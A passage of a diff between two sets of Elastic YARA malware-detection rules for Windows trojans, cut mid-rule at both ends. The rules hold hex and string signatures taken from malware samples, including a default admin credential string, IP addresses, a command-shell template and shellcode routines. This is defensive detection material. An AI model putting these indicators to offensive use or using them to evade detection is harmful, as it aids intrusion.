"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa" + logic_hash = "72bfefc8f92dbe65d197e02bf896315dcbc54d7b68d0434f43de026ccf934f40" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "573b6c5400400b167edd94e12332d421a32dc52138a2a933f2fa85f8409c8e4a" - severity = 50 + fingerprint = "6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0" + severity = 25 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 49 6E 73 74 61 6C 6C 65 72 20 77 69 6C 6C 20 6E 6F 77 20 64 6F 77 6E 6C 6F 61 64 20 66 69 6C 65 73 20 72 65 71 75 69 72 65 64 20 66 6F 72 20 69 6E 73 74 61 6C 6C 61 74 69 6F 6E 2E } + $a = "_kasssperskdy" wide fullword + $b = "[Time:]%d-%d-%d %d:%d:%d" wide fullword + $c = "{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}" wide fullword condition: - all of them + 2 of them } -rule ELASTIC_Windows_Generic_Threat_6B621667 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_Ae824B13 : REF1296 FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "6b621667-8ed2-4a6e-9fad-fc7a01012859" - date = "2024-01-31" - modified = "2024-02-08" + id = "ae824b13-eaae-49e6-a965-ff10379f3c41" + date = "2022-02-03" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2457-L2475" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b50b39e460ecd7633a42f0856359088de20512c932fc35af6531ff48c9fa638a" - logic_hash = "3574b7ef24c4387a9919ed9831af7657047b26d8922ab78788619bbd3d0edd56" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L23-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "cee46c1efdaa1815606f932a4f79b316e02c1b481e73c4c2f8b7c72023e8684c" score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "77d3637fea6d1ddca7b6943671f2d776fa939b063d60d8b659a0fc63acfdc869" - severity = 50 + quality = 67 + tags = "REF1296, FILE, MEMORY" + fingerprint = "8658996385aac060ebe9eab45bbea8b05b9008926bb3085e5589784473bc3086" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 51 64 A1 30 00 00 00 56 33 F6 89 75 FC 8B 40 10 39 70 08 7C 0F 8D 45 FC 50 E8 8F 0D 00 00 83 7D FC 01 74 03 33 F6 46 8B C6 5E C9 C3 8B FF 55 8B EC 51 51 53 56 6A 38 6A 40 E8 32 EB FF } + $a1 = { 31 31 34 2E 31 31 34 2E 31 31 34 2E 31 31 34 } + $a2 = { 69 6E 66 6F 40 63 69 61 2E 6F 72 67 30 } + $a3 = { 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 33 3B 20 57 4F 57 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 74 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F 6D 65 2F 35 30 2E 30 2E 32 36 36 31 2E 39 34 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 } + $a4 = { 75 73 65 72 25 33 64 61 64 6D 69 6E 25 32 36 70 61 73 73 77 6F 72 64 25 33 64 64 65 66 61 75 6C 74 25 34 30 72 6F 6F 74 } condition: - all of them + 3 of them } -rule ELASTIC_Windows_Generic_Threat_C374Cd85 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_Eb47E754 : REF1296 FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "c374cd85-714b-47c5-8645-cc7918fa2ff1" - date = "2024-01-31" - modified = "2024-02-08" + id = "eb47e754-9b4d-45e7-b76c-027d03326c6c" + date = "2022-02-03" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2477-L2495" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1c677585a8b724332849c411ffe2563b2b753fd6699c210f0720352f52a6ab72" - logic_hash = "8e183f780400f3bf9840798d53b431a4bf28bc43e07d69a3d614217e02f5dd79" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L45-L65" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "1d96e813ed0261bd0d7caca2803ed8d5fe4d77ea00efc9130eef86aa872c4656" score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "4936566b7f3f8250b068aa8e4a9b745c3e9ce2fa35164a94e77b31068d3d6ebf" - severity = 50 + quality = 67 + tags = "REF1296, FILE, MEMORY" + fingerprint = "b71d13a34e5f791612ed414b8b0e993b1f476a8398a1b0be39046914ac5ac21d" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 0C 53 8B 5E 74 39 9E 44 01 00 00 75 07 33 C0 E9 88 00 00 00 57 8B BE E0 00 00 00 85 FF 74 79 8B 8E E4 00 00 00 85 C9 74 6F 8B 86 44 01 00 00 8B D0 03 C7 8D 4C 01 F8 2B D3 89 4D } + $a1 = { 41 20 61 74 20 4C 20 25 64 } + $a2 = { 74 63 70 69 70 5F 74 68 72 65 61 64 } + $a3 = { 32 30 38 2E 36 37 2E 32 32 32 2E 32 32 32 } + $a4 = { 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 33 3B 20 57 4F 57 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 74 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F 6D 65 2F 35 37 2E 30 2E 32 39 38 37 2E 31 33 33 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 } condition: - all of them + 3 of them } -rule ELASTIC_Windows_Generic_Threat_7693D7Fd : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_C7Fd8D38 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "7693d7fd-4161-4afb-8a8d-d487f2a7de5e" - date = "2024-02-13" - modified = "2024-06-12" + id = "c7fd8d38-eaba-424d-b91a-098c439dab6b" + date = "2022-02-17" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2497-L2515" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fc40cc5d0bd3722126302f74ace414e6934eca3a8a5c63a11feada2130b34b89" - logic_hash = "886ad084f33faf8baae8a650a88095757c2cff9e18c8f5c50ff36120b43ec082" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L67-L89" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a1702ec12c2bf4a52e11fbdab6156358084ad2c662c8b3691918ef7eabacde96" + logic_hash = "81c56cd741692a7f2a894c2b8f2676aad47f14221228b9466a2ab0f05d76c623" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "92489c8eb4f8a9da5e7bd858a47e20b342d70df1ba3a4769df06c434dc83d138" - severity = 50 + fingerprint = "dc14cd519b3bbad7c2e655180a584db0a4e2ad4eea073a52c94b0a88152b37ba" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 51 51 8B 45 08 83 65 FC 00 8B 00 0F B7 48 14 66 83 78 06 00 8D 4C 01 18 0F 86 9A 00 00 00 53 56 57 8D 59 24 8B 13 8B CA 8B F2 C1 E9 1D C1 EE 1E 8B FA 83 E1 01 83 E6 01 C1 EF 1F F7 C2 } + $a1 = "PCREDENTIAL" ascii fullword + $a2 = "gHotkey" ascii fullword + $a3 = "EFORMATEX" ascii fullword + $a4 = "ZLibEx" ascii fullword + $a5 = "9Root!" ascii fullword condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Df5De012 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_Bbe6C282 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "df5de012-52b6-4558-a00b-2dbf052e34d3" - date = "2024-02-14" - modified = "2024-06-12" + id = "bbe6c282-e92d-4021-bdaf-189337e4abf0" + date = "2022-03-02" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2517-L2535" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "13c06d7b030a46c6bb6351f40184af9fafaf4c67b6a2627a45925dd17501d659" - logic_hash = "1a1ce3644c33a4591ab6582525366d47e07bdc2350aa6066ec5b5fedc605b037" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L91-L109" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a44c46d4b9cf1254aaabd1e689f84c4d2c3dd213597f827acabface03a1ae6d1" + logic_hash = "fe874d69ae71775cf997845c90e731479569e2ac1ac882a4b8c3c73d015b1f30" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "ee293cda37e0f1c76f89a7d1e074c9591950299b2ae87cca11c6cf7fbfee1fc4" - severity = 50 + fingerprint = "e004d77440a86c23f23086e1ada6d1453178b9c2292782c1c88a7b14151c10fe" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 20 2C 3F 2C 2F 2C 37 2C 27 2C 3B 2C 2B 2C 33 2C 23 2C 3D 2C 2D 2C 35 2C 25 2C 39 2C 29 2C 31 2C 21 2C 3E 2C 2E 2C 36 2C 26 2C 3A 2C 2A 2C 32 2C 22 2C 3C 2C 2C 2C 34 2C 24 2C 38 2C 28 2C 30 2C 20 } + $a1 = { 00 D1 1C A5 03 08 08 00 8A 5C 01 08 08 00 8A 58 01 2E 54 FF } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_0E8530F5 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_889B1248 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "0e8530f5-32ce-48a2-9413-5a8f4596ba12" - date = "2024-02-14" - modified = "2024-06-12" + id = "889b1248-a694-4c9b-8792-c04e582e814c" + date = "2022-03-11" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2537-L2556" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9f44d9acf79ed4450195223a9da185c0b0e8a8ea661d365a3ddea38f2732e2b8" - logic_hash = "f4a010366625c059151d3e704f6ece1808f367401729feaf6cc423cf4d5c5c60" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L111-L132" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a48d57a139c7e3efa0c47f8699e2cf6159dc8cdd823b16ce36257eb8c9d14d53" + logic_hash = "b3bb93b95377d6c6606d29671395b78c0954cc47d5cc450436799638d0458469" score = 75 - quality = 71 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "33007c3793c74aaac45434cbd0b524973073a7223d68fae8da5cbd7296120739" - severity = 50 + fingerprint = "a5e0c2bbd6a297c01f31eccabcbe356730f50f074587f679da6caeca99e54bc1" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 63 6D 64 20 2F 63 20 73 74 61 72 74 20 22 22 20 22 25 53 25 53 22 20 25 53 } - $a2 = { 76 68 61 50 20 71 20 65 71 30 75 61 } + $a1 = "BELARUS-VIRUS-MAKER" ascii fullword + $a2 = "C:\\windows\\temp\\" ascii fullword + $a3 = "~c~a~n~n~a~b~i~s~~i~s~~n~o~t~~a~~d~r~u~g~" ascii fullword + $a4 = "untInfector" ascii fullword condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Ba807E3E : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_02A87A20 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "ba807e3e-13d8-49e0-ad99-32994d490e8b" - date = "2024-02-14" - modified = "2024-06-12" + id = "02a87a20-a5b4-44c6-addc-c70b327d7b2c" + date = "2022-03-04" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2558-L2576" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cabd0633b37e6465ece334195ff4cc5c3f44cfe46211165efc07f4073aed1049" - logic_hash = "896eedb949eec6dff3e867ae3179b741382dd25ba06c6db452ac1ae5bc6bc757" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L134-L152" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033" + logic_hash = "610db1b429ed2ecfc552f73ed4782cb56254e6fc98b728ffeff6938fbcce9616" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e6ea7577f8f21e778d21b4651bf55e66ec53fb6d80d68f2ab344261be50d03cc" - severity = 50 + fingerprint = "fb25a522888efa729ee6d43a3eec7ade3d08dba394f3592d1c3382a5f7a813c8" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 7D 4A 36 35 2B 7E 2E 2C 2F 37 2C 3D 31 7E 3B 3D 30 30 2F 2A 7E 3C 39 7E 2C 29 30 7E 35 30 7E 5A 4F 4B 7E 31 2F 3A 39 70 } + $a1 = { 24 3C 8B C2 2B C1 83 F8 01 72 3A 8D 41 01 83 FA 08 89 44 24 38 8D 44 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_4578Ee8C : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_4Fbff084 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Shellcode found in REF2924, belonging to for now unknown trojan" author = "Elastic Security" - id = "4578ee8c-9dfc-4fb2-b5dc-8f55b6ee26d0" - date = "2024-02-14" - modified = "2024-06-12" + id = "4fbff084-5280-4ff8-9c21-c437207231a5" + date = "2023-02-28" + modified = "2023-04-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2578-L2596" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "699fecdb0bf27994d67492dc480f4ba1320acdd75e5881afbc5f73c982453fed" - logic_hash = "1a519bb84aae29057536ea09e53ff97cfe34a70c84ac6fa7d1ec173de3754f03" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L154-L175" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7010a69ba77e65e70f4f3f4a10af804e6932c2218ff4abd5f81240026822b401" + logic_hash = "47d1a01e0edee3239d99ff1f32eb4cfc77d6e38823fed799a562e142d3d3a22d" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "3a40e6e8f35c5c114b1b0175723d9403c357bba7170c4350194d40d4a2c94c61" - severity = 50 + fingerprint = "728d7877e7a16fbb756b1c3b6c90ff3b718f0f750803b6a1549cb32c69be0dfc" + threat_name = "Windows.Trojan.Generic" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 73 65 72 2D 41 67 65 6E 74 3A 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 25 64 2E 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 25 64 2E 31 3B 20 53 56 31 29 } + $string_decryption = { 8A 44 30 ?? 8A CD 88 45 ?? 32 C5 C0 C1 ?? 88 04 3E 0F B6 C5 0F B6 D9 0F AF D8 0F B6 C1 0F B6 D1 88 6D ?? 0F AF D0 0F B6 C5 0F B6 CD 0F AF C8 8A 6D ?? 8A 45 ?? C0 CB ?? 02 D1 32 DA 02 EB 88 6D ?? 38 45 ?? 74 ?? 8B 45 ?? 46 81 FE ?? ?? ?? ?? 7C ?? } + $thread_start = { E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? BB ?? ?? ?? ?? 50 6A ?? 5A 8B CF 89 5C 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 89 5C 24 ?? 50 6A ?? 5A 8B CF E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 89 5C 24 ?? 50 6A ?? 5A 8B CF E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 89 5C 24 ?? 50 6A ?? 5A 8B CF E8 ?? ?? ?? ?? } + $resolve = { 8B 7A ?? 8D 5D ?? 85 FF 74 ?? 0F B7 0F 8D 7F ?? 8D 41 ?? 83 F8 ?? 77 ?? 83 C1 ?? 0F B7 33 83 C3 ?? 8D 46 ?? 83 F8 ?? 77 ?? 83 C6 ?? 85 C9 } condition: - all of them + 2 of them } -rule ELASTIC_Windows_Generic_Threat_Ebf62328 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_73Ed7375 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "ebf62328-f069-43f2-b943-6ddf64f04fb2" - date = "2024-02-14" - modified = "2024-06-12" + id = "73ed7375-c8ab-4d95-ae66-62b1b02a3d1e" + date = "2023-05-09" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2598-L2618" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dfce19aa2e1a3e983c3bfb2e4bbd7617b96d57602d7a6da6fee7b282e354c9e1" - logic_hash = "e99b56dde761c5efad14f935befa4d1dbb31cd305b5d6af05a90d44dc3cd0098" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L177-L196" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2b17328a3ef0e389419c9c86f81db4118cf79640799e5c6fdc97de0fc65ad556" + logic_hash = "7e27c9377d0b2058a2a36da4ac7d37a54c566f3246e69aa356171edae6b478c5" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "44cce86a986cbb051f1b94c2d5b54830cbe7de1f3387e207bd6b267a5166bbe7" - severity = 50 + fingerprint = "a026cc2db3bfebca4b4ea6e9dc41c2b18d0db730754ef3131d812d7ef9cd17d6" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 74 52 75 50 5B 5D 5F 5E 41 5C 41 5D 41 5E } - $a2 = { 5F 5E 41 5C 41 5E 41 5F 74 7A 75 78 } - $a3 = { 44 64 71 52 71 77 7C 61 69 41 66 6E 68 73 6F 72 48 60 6C 65 49 46 } + $a1 = { 48 8B 03 48 8B CE 49 8D 54 04 02 41 FF D6 48 89 03 48 83 C3 08 48 } + $a2 = { 41 3C 42 8B BC 08 88 00 00 00 46 8B 54 0F 20 42 8B 5C 0F 24 4D } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Dcc622A4 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_96Cdf3C4 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "dcc622a4-5c10-463b-a950-fc728f990bca" - date = "2024-02-14" - modified = "2024-06-12" + id = "96cdf3c4-6f40-4eb3-8bfd-b3c41422388a" + date = "2023-05-09" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2620-L2638" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "94a3f10396c07783586070119becf0924de9a7caf449d6e07065837d54e6222d" - logic_hash = "9254226918f39389ccc347de1c5064552a8500ccef1884b8e27b6e98c651f45b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L198-L217" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9a4d68de36f1706a3083de7eb41f839d8c7a4b8b585cc767353df12866a48c81" + logic_hash = "f92e5549aca320d71e1eec8daa82e8bbf3517c7f23f376bb355fdfa32da2e7a9" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "b47bd4baa68dc56948f29882cf5762b0af2d9f2a837349add4f5d0a8d4152cb2" - severity = 50 + fingerprint = "1037576e2c819031d5dc8067650c6b869e4d352ab7553fb5676a358059b37943" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 5B 21 5D 20 45 72 72 6F 72 20 77 72 69 74 69 6E 67 20 73 68 65 6C 6C 63 6F 64 65 20 74 6F 20 74 68 65 20 74 61 72 67 65 74 20 64 72 69 76 65 72 2C 20 61 62 6F 72 74 } + $a1 = { 74 24 28 48 8B 46 10 48 8B 4E 18 E8 9A CA F8 FF 84 C0 74 27 48 8B 54 } + $a2 = { F2 74 28 48 89 54 24 18 48 89 D9 48 89 D3 E8 55 40 FF FF 84 C0 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_046Aa1Ec : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_F0C79978 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "046aa1ec-5134-4a03-85c2-048b5d363484" - date = "2024-02-20" - modified = "2024-06-12" + id = "f0c79978-2df9-4ae2-bc5d-b5366acff41b" + date = "2023-07-27" + modified = "2023-09-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2640-L2658" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c74cf499fb9298d43a6e64930addb1f8a8d8336c796b9bc02ffc260684ec60a2" - logic_hash = "da6552da3db4851806f5a0ce3c324a79acf4ee4b2690cb02cc8d8c88a2ba28f8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L219-L238" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8f800b35bfbc8474f64b76199b846fe56b24a3ffd8c7529b92ff98a450d3bd38" + logic_hash = "b16971ed0947660dda8d79c11531a9498a80e00f2dbc2c0eb63895b7f5c5f980" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "46591671500f83b6627a17368a0bbe43650da1dd58ba1a136a47818fe685bc68" - severity = 50 + fingerprint = "94b2a5784ae843b831f9ce34e986b2687ded5c754edf44ff20490b851e0261fc" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 C4 F4 D9 7D FE 66 8B 45 FE 80 CC 0C 66 89 45 FC D9 6D FC DF 7D F4 D9 6D FE 8B 45 F4 8B 55 F8 8B E5 5D C3 55 8B EC 51 33 D2 8D 5D 08 8B 03 83 C3 04 85 C0 74 03 03 50 04 49 75 F1 85 } + $a1 = "\\IronPython." + $a2 = "\\helpers\\execassembly_x64" condition: all of them } -rule ELASTIC_Windows_Generic_Threat_85C73807 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_40899C85 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "85c73807-4181-4d4a-ba51-6ed923121486" - date = "2024-02-20" - modified = "2024-06-12" + id = "40899c85-bb49-412c-8081-3a1359957c52" + date = "2023-12-15" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2660-L2678" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7f560a22c1f7511518656ac30350229f7a6847d26e1b3857e283f7dcee2604a0" - logic_hash = "90aa64f17b91ccdf367e1976cd1f5e89e15c7369a58b2d19187143e70939d756" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L240-L260" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "88eb4f2e7085947bfbd03c69573fdca0de4a74bab844f09ecfcf88e358af20cc" + logic_hash = "317034add0343baa26548712de8b2acc04946385fbee048cea0bd8d7ae642b36" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8b63723aa1b89149c360048900a18e25a0a615f50cec1aaadca2578684f5bcb2" - severity = 50 + fingerprint = "d02a17a3b9efc2fd991320a5db7ab2384f573002157cddcd12becf137e893bd8" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 51 53 56 57 89 4D FC 8B DA 8B F0 8B 7D 08 C6 86 18 01 00 00 00 8B C3 E8 15 01 00 00 84 C0 75 0E 8B 55 FC 8B C6 8B 